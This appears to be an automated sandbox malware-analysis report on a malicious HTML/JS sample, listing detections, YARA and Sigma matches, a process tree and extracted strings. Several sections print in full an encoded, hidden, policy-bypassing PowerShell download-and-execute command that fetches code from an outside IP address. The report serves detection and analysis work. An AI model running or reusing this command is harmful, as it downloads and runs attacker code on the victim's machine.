Windows Analysis Report file.html

Overview

General Information

Sample Name: file.html
Analysis ID: 299
MD5: 21ce403bd23afad9004a40cd043d8f2b
SHA1: ca86174a3ac0f03ca8cf27a5c55aa06cd0990f2c
SHA256: 4826c5084dca50458c9584abb4046f06afdf6f6f4ee342364544fc0e892abaa9

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Yara detected Powershell download and execute
Sigma detected: Suspicious Script Execution From Temp Folder
PowerShell case anomaly found
Wscript starts Powershell (via cmd or directly)
Sigma detected: Suspicious Encoded PowerShell Command Line
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Sigma detected: WScript or CScript Dropper
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is start
  • chrome.exe (PID: 6020 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation --single-argument C:\Users\user\Desktop\file.html MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 7472 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 7180 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 8712 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 8256 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • chrome.exe (PID: 8600 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8 MD5: 74859601FB4BEEA84B40D874CCB56CAB)
    • explorer.exe (PID: 3676 cmdline: C:\Windows\Explorer.EXE MD5: D7874DD30BA935AAED6F730A0ED84610)
      • wscript.exe (PID: 6608 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
        • cmd.exe (PID: 7184 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA= MD5: 9D59442313565C2E0860B88BF32B2277)
          • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
          • powershell.exe (PID: 7296 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA= MD5: CDA48FC75952AD12D99E526D0B6BF70A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
  • 0x11b:$sa1: -enc
  • 0x4df:$sa1: -enc
  • 0x106:$sb1: -w hidden
  • 0x4ca:$sb1: -w hidden
  • 0x101:$sc1: -nop
  • 0x4c5:$sc1: -nop
  • 0x110:$se1: -ep bypass
  • 0x4d4:$se1: -ep bypass
C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

    Memory Dumps

    Source | Rule | Description | Author | Strings
    00000013.00000003.10199880080.000001AF430F8000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x2bc:$s1: poWERshEll
    00000016.00000002.10523891301.000001C9302F0000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x1650:$s1: poWERshEll
    • 0x2314:$s1: poWERshEll
    • 0x2f64:$s1: poWERshEll
    • 0x323c:$s1: poWERshEll
    00000013.00000003.10197684686.000001AF430F8000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x2bc:$s1: poWERshEll
    00000013.00000003.10199731855.000001AF430F8000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x2bc:$s1: poWERshEll
    00000013.00000002.10205510794.000001AF433E5000.00000004.00000040.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x41ba:$s1: poWERshEll

    Sigma Overview

    System Summary:

    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process started; Author: Florian Roth, Max Altgelt; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3676, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ProcessId: 6608
    Sigma detected: Suspicious Encoded PowerShell Command Line
    Source: Process started; Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6608, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, ProcessId: 7184
    Sigma detected: WScript or CScript Dropper
    Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3676, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ProcessId: 6608
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
    Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3676, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js' , ProcessId: 6608
    Sigma detected: Non Interactive PowerShell
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: FD, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7184, ProcessCommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=, ProcessId: 7296

    Jbx Signature Overview

    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp
    Source: Binary string: omation.pdb source: powershell.exe, 00000016.00000002.10534340939.000001C94736F000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp
    Source: global traffic; HTTP traffic detected: GET /click.php HTTP/1.1 Host: 185.244.41.28 Connection: Keep-Alive
    Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.21.200
    Source: unknown; TCP traffic detected without corresponding DNS query: 8.241.126.121
    Source: unknown; TCP traffic detected without corresponding DNS query: 93.184.220.29
    Source: unknown; TCP traffic detected without corresponding DNS query: 8.248.117.254
    Source: powershell.exe, 00000016.00000002.10503275805.000001C92F82A000.00000004.00000001.sdmp; String found in binary or memory: http://185.244.41.28
    Source: powershell.exe, 00000016.00000002.10525450774.000001C9303B4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10528004322.000001C930650000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10522816383.000001C93029F000.00000004.00000001.sdmp, PowerShell_transcript.841675.bhylW44j.20210816191151.txt.22.dr; String found in binary or memory: http://185.244.41.28/c
    Source: powershell.exe, 00000016.00000002.10493820703.000001C92F054000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.10491858613.000001C92EE31000.00000004.00000001.sdmp, PowerShell_transcript.841675.bhylW44j.20210816191151.txt.22.dr; String found in binary or memory: http://185.244.41.28/click.php
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
    Source: file.htmlString found in binary or memory: http://s7d9.scene7.com/is/image/AdobeDemandCreative/?fmt=png&amp;size=240
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
    Source: powershell.exe, 00000016.00000002.10491858613.000001C92EE31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://tools.ietf.org/html/rfc1950
    Source: explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
    Source: explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
    Source: explorer.exe, 0000000C.00000000.9835085405.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
